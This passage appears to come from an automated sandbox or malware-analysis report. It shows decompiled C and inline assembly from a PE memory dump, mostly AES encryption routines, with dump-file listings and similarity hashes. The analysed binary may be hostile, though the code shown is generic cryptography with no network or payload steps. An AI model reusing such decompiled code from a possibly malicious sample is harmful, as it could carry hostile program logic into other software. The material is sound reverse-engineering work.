                                                              									asm("xorps xmm5, xmm0");
                                                              									asm("movups [edi+0x20], xmm4");
                                                              									asm("pxor xmm4, xmm4");
                                                              									_t57 = _t57 + 0x30;
                                                              									asm("movaps xmm2, xmm5");
                                                              									asm("pxor xmm5, xmm5");
                                                              									_t29 = _t33 - 0x40;
                                                              								} else {
                                                              									asm("movups xmm6, [esi+0x40]");
                                                              									asm("movaps [esp], xmm7");
                                                              									asm("movups xmm2, [esi]");
                                                              									asm("xorps xmm7, xmm7");
                                                              									_t34 = E00B98BE0(_t28, _t45, _t54);
                                                              									asm("movups xmm1, [esi]");
                                                              									asm("movups xmm0, [esi+0x10]");
                                                              									asm("xorps xmm2, [esp]");
                                                              									asm("xorps xmm3, xmm1");
                                                              									asm("movups xmm1, [esi+0x20]");
                                                              									asm("xorps xmm4, xmm0");
                                                              									asm("movups xmm0, [esi+0x30]");
                                                              									asm("xorps xmm5, xmm1");
                                                              									asm("movups xmm7, [esi+0x40]");
                                                              									asm("xorps xmm6, xmm0");
                                                              									asm("movups [edi], xmm2");
                                                              									asm("movups [edi+0x10], xmm3");
                                                              									asm("pxor xmm3, xmm3");
                                                              									asm("movups [edi+0x20], xmm4");
                                                              									asm("pxor xmm4, xmm4");
                                                              									asm("movups [edi+0x30], xmm5");
                                                              									asm("pxor xmm5, xmm5");
                                                              									_t57 = _t57 + 0x40;
                                                              									asm("movaps xmm2, xmm6");
                                                              									asm("pxor xmm6, xmm6");
                                                              									_t29 = _t34 - 0x50;
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L28;
                                                              					} else {
                                                              						asm("movaps [esp], xmm7");
                                                              						_t35 = _t28 - 0x50;
                                                              						while(1) {
                                                              							asm("movdqu xmm2, [esi]");
                                                              							asm("movdqu xmm3, [esi+0x10]");
                                                              							asm("movdqu xmm4, [esi+0x20]");
                                                              							asm("movdqu xmm5, [esi+0x30]");
                                                              							asm("movdqu xmm6, [esi+0x40]");
                                                              							asm("movdqu xmm7, [esi+0x50]");
                                                              							_t36 = E00B98BE0(_t35, _t45, _t54);
                                                              							asm("movups xmm1, [esi]");
                                                              							asm("movups xmm0, [esi+0x10]");
                                                              							asm("xorps xmm2, [esp]");
                                                              							asm("xorps xmm3, xmm1");
                                                              							asm("movups xmm1, [esi+0x20]");
                                                              							asm("xorps xmm4, xmm0");
                                                              							asm("movups xmm0, [esi+0x30]");
                                                              							asm("xorps xmm5, xmm1");
                                                              							asm("movups xmm1, [esi+0x40]");
                                                              							asm("xorps xmm6, xmm0");
                                                              							asm("movups xmm0, [esi+0x50]");
                                                              							asm("xorps xmm7, xmm1");
                                                              							asm("movups [edi], xmm2");
                                                              							asm("movups [edi+0x10], xmm3");
                                                              							_t17 = _t63 + 0x60; // 0xcccccccc
                                                              							_t63 = _t17;
                                                              							asm("movups [edi+0x20], xmm4");
                                                              							_t45 = _t44;
                                                              							asm("movups [edi+0x30], xmm5");
                                                              							_t54 = _t66;
                                                              							asm("movups [edi+0x40], xmm6");
                                                              							_t57 = _t57 + 0x50;
                                                              							_t35 = _t36 - 0x60;
                                                              							if(_t35 <= 0) {
                                                              								break;
                                                              							}
                                                              							asm("movaps [esp], xmm0");
                                                              							asm("movups [edi], xmm7");
                                                              							_t57 = _t57 + 0x10;
                                                              						}
                                                              						asm("movaps xmm2, xmm7");
                                                              						asm("movaps xmm7, xmm0");
                                                              						_t29 = _t35 + 0x50;
                                                              						if(_t29 <= 0) {
                                                              							asm("pxor xmm3, xmm3");
                                                              							asm("pxor xmm4, xmm4");
                                                              							asm("pxor xmm5, xmm5");
                                                              							asm("pxor xmm6, xmm6");
                                                              							L28:
                                                              							_t30 = _t29 & 0x0000000f;
                                                              							if(_t30 != 0) {
                                                              								asm("movaps [esp], xmm2");
                                                              								asm("pxor xmm0, xmm0");
                                                              								_t30 = memcpy(_t57, _t69, 0x10);
                                                              								asm("movdqa [esp], xmm2");
                                                              							} else {
                                                              								asm("movups [edi], xmm2");
                                                              								asm("pxor xmm0, xmm0");
                                                              							}
                                                              							L31:
                                                              							asm("pxor xmm2, xmm2");
                                                              							asm("pxor xmm1, xmm1");
                                                              							asm("movups [ebp], xmm7");
                                                              							asm("pxor xmm7, xmm7");
                                                              							return _t30;
                                                              						}
                                                              						asm("movups [edi], xmm2");
                                                              						_t57 = _t57 + 0x10;
                                                              						goto L16;
                                                              					}
                                                              				}
                                                              				asm("movaps xmm2, xmm7");
                                                              				if(_t28 < 0x10) {
                                                              					L9:
                                                              					_t49 = _t28;
                                                              					_t37 = memcpy(_t57, _t63, _t49);
                                                              					_t61 = _t63 + _t49 + _t49;
                                                              					_t39 = memset(_t61, 0, 0x10 << 0);
                                                              					_t69 = _t69 + 0x18;
                                                              					_t57 = _t61 + 0x10 - _t37 - 0x10;
                                                              					_t45 = _t44;
                                                              					_t63 = _t57;
                                                              					_t54 = _t66;
                                                              					goto L4;
                                                              				} else {
                                                              					_t39 = _t28 - 0x10;
                                                              					do {
                                                              						L4:
                                                              						asm("movups xmm7, [esi]");
                                                              						_t10 = _t63 + 0x10; // 0xcccccccc
                                                              						_t63 = _t10;
                                                              						asm("movups xmm0, [edx]");
                                                              						asm("movups xmm1, [edx+0x10]");
                                                              						asm("xorps xmm7, xmm0");
                                                              						_t56 = _t54 + 0x20;
                                                              						asm("xorps xmm2, xmm7");
                                                              						do {
                                                              							asm("aesenc xmm2, xmm1");
                                                              							_t45 = _t45 - 1;
                                                              							asm("movups xmm1, [edx]");
                                                              							_t12 = _t56 + 0x10; // 0xcccccccc
                                                              							_t56 = _t12;
                                                              						} while (_t45 != 0);
                                                              						asm("aesenclast xmm2, xmm1");
                                                              						_t45 = _t44;
                                                              						_t54 = _t66;
                                                              						asm("movups [edi], xmm2");
                                                              						_t57 = _t57 + 0x10;
                                                              						_t39 = _t39 - 0x10;
                                                              					} while (_t39 >= 0);
                                                              					_t28 = _t39 + 0x10;
                                                              					if(_t28 != 0) {
                                                              						goto L9;
                                                              					} else {
                                                              						asm("movaps xmm7, xmm2");
                                                              						asm("pxor xmm2, xmm2");
                                                              						goto L31;
                                                              					}
                                                              				}
                                                              			}




























                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c67d0a1af6e8a7f01c2d12470aae2a1adc6c6e898a60526834b0ff204231690
                                                              • Instruction ID: a4bf5a19082e14441ec482e53024efdb10fe50ab9724abd22fd957d4621c9519
                                                              • Opcode Fuzzy Hash: 1c67d0a1af6e8a7f01c2d12470aae2a1adc6c6e898a60526834b0ff204231690
                                                              • Instruction Fuzzy Hash: 9D91B810D1CF9D83E6129F3985411A7B7E0BEBE308B15DB5AEDD876822DB20B6D59280
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 62%
                                                              			E00BA17E0(signed int* _a12) {
                                                              				void* _t46;
                                                              				signed int _t49;
                                                              				signed int _t66;
                                                              				signed int _t75;
                                                              				signed int _t78;
                                                              				signed int _t105;
                                                              				signed int _t108;
                                                              				signed int _t130;
                                                              				signed int _t133;
                                                              				intOrPtr* _t141;
                                                              				signed int* _t142;
                                                              				intOrPtr* _t145;
                                                              
                                                              				_t46 = E00BA1500();
                                                              				if(_t46 == 0) {
                                                              					_t145 = _a12;
                                                              					_t141 = _t145 +  *(_t145 + 0xf0) * 4 * 4;
                                                              					do {
                                                              						 *_t141 =  *_t145;
                                                              						 *((intOrPtr*)(_t141 + 4)) =  *((intOrPtr*)(_t145 + 4));
                                                              						 *_t145 =  *_t141;
                                                              						 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t141 + 4));
                                                              						 *((intOrPtr*)(_t141 + 8)) =  *((intOrPtr*)(_t145 + 8));
                                                              						 *((intOrPtr*)(_t141 + 0xc)) =  *((intOrPtr*)(_t145 + 0xc));
                                                              						 *((intOrPtr*)(_t145 + 8)) =  *((intOrPtr*)(_t141 + 8));
                                                              						 *((intOrPtr*)(_t145 + 0xc)) =  *((intOrPtr*)(_t141 + 0xc));
                                                              						_t145 = _t145 + 0x10;
                                                              						_t141 = _t141 - 0x10;
                                                              					} while (_t145 != _t141);
                                                              					_t142 = _a12;
                                                              					_a12 = _t142 + (_t142[0x3c] + _t142[0x3c] - 2) * 8;
                                                              					_t49 = _t142[4];
                                                              					do {
                                                              						_t142 =  &(_t142[4]);
                                                              						_t75 = _t49 + _t49 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t49) >> 0x00000007) & 0x1b1b1b1b;
                                                              						_t100 = _t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b;
                                                              						asm("rol eax, 0x8");
                                                              						asm("rol ebx, 0x18");
                                                              						asm("rol ecx, 0x10");
                                                              						asm("rol edx, 0x8");
                                                              						_t78 = _t142[1];
                                                              						 *_t142 = _t49 ^ _t75 ^ _t49 ^ _t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b ^ _t49 ^ (_t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b) + _t100 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t100) >> 0x00000007) & 0x1b1b1b1b ^ _t75 ^ _t49 ^ (_t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b) + _t100 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t100) >> 0x00000007) & 0x1b1b1b1b ^ _t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b ^ _t49 ^ (_t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b) + _t100 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t100) >> 0x00000007) & 0x1b1b1b1b ^ (_t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b) + _t100 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t100) >> 0x00000007) & 0x1b1b1b1b;
                                                              						_t105 = _t78 + _t78 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t78) >> 0x00000007) & 0x1b1b1b1b;
                                                              						_t125 = _t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b;
                                                              						asm("rol ebx, 0x8");
                                                              						asm("rol ecx, 0x18");
                                                              						asm("rol edx, 0x10");
                                                              						asm("rol eax, 0x8");
                                                              						_t108 = _t142[2];
                                                              						_t142[1] = _t78 ^ _t105 ^ _t78 ^ _t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b ^ _t78 ^ (_t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b) + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ _t105 ^ _t78 ^ (_t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b) + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ _t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b ^ _t78 ^ (_t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b) + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ (_t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b) + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b;
                                                              						_t130 = _t108 + _t108 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t108) >> 0x00000007) & 0x1b1b1b1b;
                                                              						_t61 = _t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b;
                                                              						asm("rol ecx, 0x8");
                                                              						asm("rol edx, 0x18");
                                                              						asm("rol eax, 0x10");
                                                              						asm("rol ebx, 0x8");
                                                              						_t133 = _t142[3];
                                                              						_t142[2] = _t108 ^ _t130 ^ _t108 ^ _t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b ^ _t108 ^ (_t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b) + _t61 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t61) >> 0x00000007) & 0x1b1b1b1b ^ _t130 ^ _t108 ^ (_t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b) + _t61 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t61) >> 0x00000007) & 0x1b1b1b1b ^ _t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b ^ _t108 ^ (_t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b) + _t61 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t61) >> 0x00000007) & 0x1b1b1b1b ^ (_t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b) + _t61 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t61) >> 0x00000007) & 0x1b1b1b1b;
                                                              						_t66 = _t133 + _t133 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t133) >> 0x00000007) & 0x1b1b1b1b;
                                                              						_t90 = _t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b;
                                                              						asm("rol edx, 0x8");
                                                              						asm("rol eax, 0x18");
                                                              						asm("rol ebx, 0x10");
                                                              						asm("rol ecx, 0x8");
                                                              						_t49 = _t142[4];
                                                              						_t142[3] = _t133 ^ _t66 ^ _t133 ^ _t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b ^ _t133 ^ (_t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b) + _t90 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t90) >> 0x00000007) & 0x1b1b1b1b ^ _t66 ^ _t133 ^ (_t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b) + _t90 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t90) >> 0x00000007) & 0x1b1b1b1b ^ _t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b ^ _t133 ^ (_t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b) + _t90 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t90) >> 0x00000007) & 0x1b1b1b1b ^ (_t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b) + _t90 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t90) >> 0x00000007) & 0x1b1b1b1b;
                                                              					} while (_t142 < _a12);
                                                              					return 0;
                                                              				} else {
                                                              					return _t46;
                                                              				}
                                                              			}















                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E00BA2850() {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t126;
                                                              				signed int* _t154;
                                                              				unsigned int _t156;
                                                              				intOrPtr _t157;
                                                              				intOrPtr _t158;
                                                              				void* _t162;
                                                              				char* _t163;
                                                              				signed char* _t164;
                                                              				void* _t179;
                                                              				void* _t182;
                                                              				signed int _t204;
                                                              				signed int* _t211;
                                                              				intOrPtr _t212;
                                                              				intOrPtr _t217;
                                                              				signed int* _t218;
                                                              				signed int* _t220;
                                                              				intOrPtr _t221;
                                                              				intOrPtr _t222;
                                                              				signed int _t224;
                                                              				void* _t226;
                                                              				signed int _t228;
                                                              
                                                              				E00C6BB10(0x3c);
                                                              				_t126 =  *0xcc5970; // 0x851ab4dd
                                                              				 *(_t228 + 0x38) = _t126 ^ _t228;
                                                              				_t128 =  *(_t228 + 0x4c);
                                                              				_t156 =  *(_t228 + 0x4c);
                                                              				_t224 =  *(_t228 + 0x48);
                                                              				_t220 =  *(_t228 + 0x5c);
                                                              				_t211 =  *(_t228 + 0x54);
                                                              				 *(_t228 + 0x24) =  *(_t228 + 0x4c);
                                                              				 *(_t228 + 0x1c) =  *(_t228 + 0x54);
                                                              				if(_t224 == _t211) {
                                                              					if(_t156 >= 0x10) {
                                                              						 *(_t228 + 0x14) = _t156 >> 4;
                                                              						do {
                                                              							 *((intOrPtr*)(_t228 + 0x28))(_t224, _t228 + 0x3c,  *(_t228 + 0x24));
                                                              							_t204 =  *_t220 ^  *(_t228 + 0x44);
                                                              							_t228 = _t228 + 0xc;
                                                              							 *_t211 = _t204;
                                                              							 *_t220 =  *_t224;
                                                              							_t211[1] = _t220[1] ^  *(_t228 + 0x3c);
                                                              							_t178 = _t220[2] ^  *(_t228 + 0x40);
                                                              							_t220[1] =  *(_t224 + 4);
                                                              							_t211[2] = _t220[2] ^  *(_t228 + 0x40);
                                                              							_t220[2] =  *(_t224 + 8);
                                                              							_t128 =  *(_t224 + 0xc);
                                                              							_t211[3] = _t220[3] ^  *(_t228 + 0x44);
                                                              							_t156 = _t156 - 0x10;
                                                              							_t224 = _t224 + 0x10;
                                                              							_t211 =  &(_t211[4]);
                                                              							_t53 = _t228 + 0x14;
                                                              							 *_t53 =  *(_t228 + 0x14) - 1;
                                                              							_t220[3] = _t128;
                                                              						} while ( *_t53 != 0);
                                                              					}
                                                              				} else {
                                                              					_t128 = _t220;
                                                              					 *(_t228 + 0x18) = _t128;
                                                              					if(_t156 >= 0x10) {
                                                              						 *(_t228 + 0x14) = _t156 >> 4;
                                                              						do {
                                                              							 *((intOrPtr*)(_t228 + 0x28))(_t224, _t211,  *(_t228 + 0x24));
                                                              							_t154 =  *(_t228 + 0x24);
                                                              							 *_t211 =  *_t211 ^  *_t154;
                                                              							_t211[1] = _t211[1] ^ _t154[1];
                                                              							_t211[2] = _t211[2] ^ _t154[2];
                                                              							_t211[3] = _t211[3] ^ _t154[3];
                                                              							 *(_t228 + 0x24) = _t224;
                                                              							_t228 = _t228 + 0xc;
                                                              							_t156 = _t156 - 0x10;
                                                              							_t224 = _t224 + 0x10;
                                                              							_t211 =  &(_t211[4]);
                                                              							_t25 = _t228 + 0x14;
                                                              							 *_t25 =  *(_t228 + 0x14) - 1;
                                                              						} while ( *_t25 != 0);
                                                              						_t128 =  *(_t228 + 0x18);
                                                              					}
                                                              					 *_t220 =  *_t128;
                                                              					_t220[1] = _t128[1];
                                                              					_t220[2] = _t128[2];
                                                              					_t178 = _t128[3];
                                                              					_t220[3] = _t128[3];
                                                              				}
                                                              				if(_t156 == 0) {
                                                              					L27:
                                                              					_pop(_t212);
                                                              					_pop(_t221);
                                                              					_pop(_t157);
                                                              					return E00C69C26(_t128, _t157,  *(_t228 + 0x48) ^ _t228, _t178, _t212, _t221);
                                                              				} else {
                                                              					_t179 = _t228 + 0x38;
                                                              					 *((intOrPtr*)(_t228 + 0x28)) = _t220 - _t179;
                                                              					_t162 = _t179;
                                                              					 *((intOrPtr*)(_t228 + 0x34)) = 1 - _t162;
                                                              					 *((intOrPtr*)(_t228 + 0x2c)) = 2 - _t179;
                                                              					 *((intOrPtr*)(_t228 + 0x30)) = 3 - _t162;
                                                              					 *(_t228 + 0x18) =  &(_t211[0]);
                                                              					 *(_t228 + 0x14) = _t211 - _t162;
                                                              					 *((intOrPtr*)(_t228 + 0x20)) = _t224 - _t162;
                                                              					do {
                                                              						 *((intOrPtr*)(_t228 + 0x28))(_t224, _t228 + 0x3c,  *(_t228 + 0x24));
                                                              						_t228 = _t228 + 0xc;
                                                              						_t128 = 0;
                                                              						while(_t128 < _t156) {
                                                              							_t164 =  &(_t128[0xe]) + _t228;
                                                              							 *(_t228 + 0x13) = _t164[ *((intOrPtr*)(_t228 + 0x20))] & 0x000000ff;
                                                              							_t164[ *(_t228 + 0x14)] =  *_t164 & 0x000000ff ^ _t164[ *((intOrPtr*)(_t228 + 0x28))];
                                                              							_t164[ *((intOrPtr*)(_t228 + 0x28))] =  *(_t228 + 0x13) & 0x000000ff;
                                                              							if( *((intOrPtr*)(_t228 + 0x34)) + _t164 >= _t156) {
                                                              								_t128 =  &(_t128[0]);
                                                              							} else {
                                                              								_t218 =  *(_t228 + 0x18);
                                                              								 *(_t228 + 0x13) =  *(_t128 + _t224 + 1) & 0x000000ff;
                                                              								 *(_t218 + _t128 - 1) = _t164[1] & 0x000000ff ^  *(_t220 +  &(_t128[0]));
                                                              								 *(_t220 +  &(_t128[0])) =  *(_t228 + 0x13) & 0x000000ff;
                                                              								if( *((intOrPtr*)(_t228 + 0x2c)) + _t164 >= _t156) {
                                                              									_t128 =  &(_t128[0]);
                                                              								} else {
                                                              									 *(_t228 + 0x13) =  *(_t128 + _t224 + 2) & 0x000000ff;
                                                              									 *(_t218 + _t128) = _t164[2] & 0x000000ff ^  *(_t220 +  &(_t128[0]));
                                                              									 *(_t220 +  &(_t128[0])) =  *(_t228 + 0x13) & 0x000000ff;
                                                              									if( *((intOrPtr*)(_t228 + 0x30)) + _t164 >= _t156) {
                                                              										_t128 =  &(_t128[0]);
                                                              									} else {
                                                              										 *(_t218 +  &(_t128[0])) = _t164[3] ^  *(_t220 +  &(_t128[0]));
                                                              										 *(_t220 +  &(_t128[0])) =  *((intOrPtr*)(_t128 + _t224 + 3));
                                                              										_t128 =  &(_t128[1]);
                                                              										if(_t128 < 0x10) {
                                                              											continue;
                                                              										} else {
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              							break;
                                                              						}
                                                              						_t178 = 0x10;
                                                              						if(_t156 <= 0x10) {
                                                              							if(_t128 < 0x10) {
                                                              								_t226 = _t224 - _t220;
                                                              								_t163 = _t220 + _t128;
                                                              								_t182 = 0x10 - _t128;
                                                              								do {
                                                              									_t128 =  *((intOrPtr*)(_t163 + _t226));
                                                              									 *_t163 =  *((intOrPtr*)(_t163 + _t226));
                                                              									_t163 = _t163 + 1;
                                                              									_t182 = _t182 - 1;
                                                              								} while (_t182 != 0);
                                                              							}
                                                              							goto L27;
                                                              						} else {
                                                              							goto L22;
                                                              						}
                                                              						goto L28;
                                                              						L22:
                                                              						 *((intOrPtr*)(_t228 + 0x20)) =  *((intOrPtr*)(_t228 + 0x20)) + 0x10;
                                                              						 *(_t228 + 0x14) =  *(_t228 + 0x14) + 0x10;
                                                              						 *(_t228 + 0x18) =  &(( *(_t228 + 0x18))[4]);
                                                              						_t156 = _t156 - 0x10;
                                                              						_t224 = _t224 + 0x10;
                                                              					} while (_t156 != 0);
                                                              					_pop(_t217);
                                                              					_pop(_t222);
                                                              					_pop(_t158);
                                                              					return E00C69C26(_t128, _t158,  *(_t228 + 0x38) ^ _t228, 0x10, _t217, _t222);
                                                              				}
                                                              				L28:
                                                              			}



























                                                              0x00ba2ad7
                                                              0x00ba2ae2
                                                              0x00ba296e
                                                              0x00ba296e
                                                              0x00ba2976
                                                              0x00ba297a
                                                              0x00ba2983
                                                              0x00ba298e
                                                              0x00ba2999
                                                              0x00ba29a8
                                                              0x00ba29ac
                                                              0x00ba29b0
                                                              0x00ba29b4
                                                              0x00ba29bf
                                                              0x00ba29c3
                                                              0x00ba29c6
                                                              0x00ba29c8
                                                              0x00ba29d8
                                                              0x00ba29e0
                                                              0x00ba29ee
                                                              0x00ba29fa
                                                              0x00ba2a05
                                                              0x00ba2a7b
                                                              0x00ba2a07
                                                              0x00ba2a0c
                                                              0x00ba2a10
                                                              0x00ba2a1c
                                                              0x00ba2a25
                                                              0x00ba2a31
                                                              0x00ba2a7e
                                                              0x00ba2a33
                                                              0x00ba2a38
                                                              0x00ba2a44
                                                              0x00ba2a4c
                                                              0x00ba2a58
                                                              0x00ba2a83
                                                              0x00ba2a5a
                                                              0x00ba2a65
                                                              0x00ba2a69
                                                              0x00ba2a6d
                                                              0x00ba2a73
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba2a79
                                                              0x00ba2a73
                                                              0x00ba2a58
                                                              0x00ba2a31
                                                              0x00000000
                                                              0x00ba2a05
                                                              0x00ba2a86
                                                              0x00ba2a8d
                                                              0x00ba2abc
                                                              0x00ba2abe
                                                              0x00ba2ac0
                                                              0x00ba2ac3
                                                              0x00ba2ac5
                                                              0x00ba2ac5
                                                              0x00ba2ac8
                                                              0x00ba2aca
                                                              0x00ba2acb
                                                              0x00ba2acb
                                                              0x00ba2ac5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba2a8f
                                                              0x00ba2a8f
                                                              0x00ba2a93
                                                              0x00ba2a97
                                                              0x00ba2a9b
                                                              0x00ba2a9d
                                                              0x00ba2a9f
                                                              0x00ba2aa7
                                                              0x00ba2aa8
                                                              0x00ba2aaa
                                                              0x00ba2ab9
                                                              0x00ba2ab9
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dee13329e3ec8f9dcf8828351503a78f365f383b957ad8070f3ddb8ee71631a4
                                                              • Instruction ID: 1f29f14bae9a827798a0a6c8b29450b51df529e73a6afd547e1c0c71f9bddae8
                                                              • Opcode Fuzzy Hash: dee13329e3ec8f9dcf8828351503a78f365f383b957ad8070f3ddb8ee71631a4
                                                              • Instruction Fuzzy Hash: 2F91687560C3418FC324CF29C58495AFBE1EFDA304F588AADE88987356D234EA49CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00BA2C00() {
                                                              				signed int* _t75;
                                                              				signed int* _t78;
                                                              				signed int* _t86;
                                                              				signed char _t87;
                                                              				signed int* _t90;
                                                              				intOrPtr* _t91;
                                                              				signed int _t95;
                                                              				signed int _t96;
                                                              				signed int* _t98;
                                                              				signed int* _t101;
                                                              				void* _t103;
                                                              				void* _t104;
                                                              				unsigned int _t105;
                                                              				intOrPtr _t108;
                                                              				intOrPtr _t109;
                                                              				signed char _t110;
                                                              				void* _t114;
                                                              				signed char* _t115;
                                                              				void* _t118;
                                                              				signed char* _t120;
                                                              				void* _t125;
                                                              				signed char* _t127;
                                                              				signed int* _t132;
                                                              				signed int* _t137;
                                                              				signed int* _t143;
                                                              				intOrPtr _t146;
                                                              				signed char* _t148;
                                                              				signed int _t151;
                                                              				signed int _t153;
                                                              				intOrPtr _t155;
                                                              				unsigned int _t159;
                                                              				void* _t164;
                                                              				void* _t167;
                                                              				void* _t168;
                                                              				void* _t169;
                                                              
